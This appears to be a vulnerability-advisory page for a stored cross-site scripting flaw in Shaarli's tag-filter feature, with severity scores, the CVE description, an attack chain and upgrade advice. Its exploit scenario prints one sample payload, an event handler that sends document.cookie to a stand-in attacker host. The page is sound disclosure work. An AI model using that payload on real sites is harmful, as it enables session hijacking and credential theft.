Skip to main content

Shaarli CVE-2026-48823

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-17 GitHub_M
4.8
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
4.8 MEDIUM
AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N
vuln.today AI
5.4 MEDIUM

Stored XSS is network-delivered to victim browsers (AV:N); any authenticated account can plant the payload (PR:L); victim browser session constitutes a changed scope (S:C); no availability impact applies.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N
Attack Vector
Local
Attack Complexity
Low
Privileges Required
High
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 20:36 vuln.today
Analysis Generated
Jun 17, 2026 - 20:36 vuln.today

DescriptionCVE.org

Shaarli is a personal bookmarking service. Versions 0.16.1 and prior contain a stored Cross-Site Scripting (XSS) vulnerability in the tag filtering functionality of Shaarli. An authenticated user can inject arbitrary JavaScript into the tags field when creating a bookmark (Shaare). The malicious payload is stored and later executed when users interact with the "Filter by tag" search feature on the homepage. User-supplied input in the tags field is not properly sanitized or output-escaped before being rendered in the tag filtering interface. When a bookmark is created with a malicious payload inside the tag field, the payload is stored in the database. Later, when a user searches using the "Filter by tag" functionality on the homepage, the application renders matching tags dynamically. If the tag value contains HTML with JavaScript event handlers, it is injected into the DOM. This impacts anyone interacting with the "Filter by tag" search functionality, administrators and privileged users. This issue has been fixed in version 0.16.2.

AnalysisAI

Stored XSS in Shaarli's tag filtering functionality permits an authenticated user to inject persistent JavaScript payloads via the bookmark tags field, which execute in the browsers of any user who subsequently interacts with the 'Filter by tag' search feature on the homepage. All Shaarli deployments running version 0.16.1 or earlier are affected, including instances where administrators use the tag-filter feature. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to Shaarli as any account with bookmark creation rights
Delivery
Create Shaare with XSS payload embedded in tag field
Exploit
Payload persists in database unmodified
Install
Victim authenticates and uses 'Filter by tag' autocomplete on homepage
C2
Awesomplete renders malicious tag into DOM without encoding
Execute
JavaScript executes in victim browser context
Impact
Session cookie or credentials exfiltrated to attacker

Vulnerability AssessmentAI

Exploitation Two concrete sequential conditions are required. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD-assigned CVSS 3.1 vector CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N yields a score of 4.8, but the AV:L (Local) designation is anomalous and inconsistent with a stored XSS vulnerability in a web application - the attack is delivered over a network to a victim's browser, not via local system access. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated Shaarli user creates a bookmark with a tag value containing an HTML event handler payload such as onmouseover=fetch('https://attacker.example/?c='+document.cookie). The tag is stored in the database as-is. …
Remediation Upgrade to Shaarli v0.16.2, released 2026-05-23, which resolves this vulnerability by encoding tag text in Awesomplete autocomplete suggestions and applies additional XSS fixes for Markdown href sanitization and thumbnail DOM insertions. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-48823 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy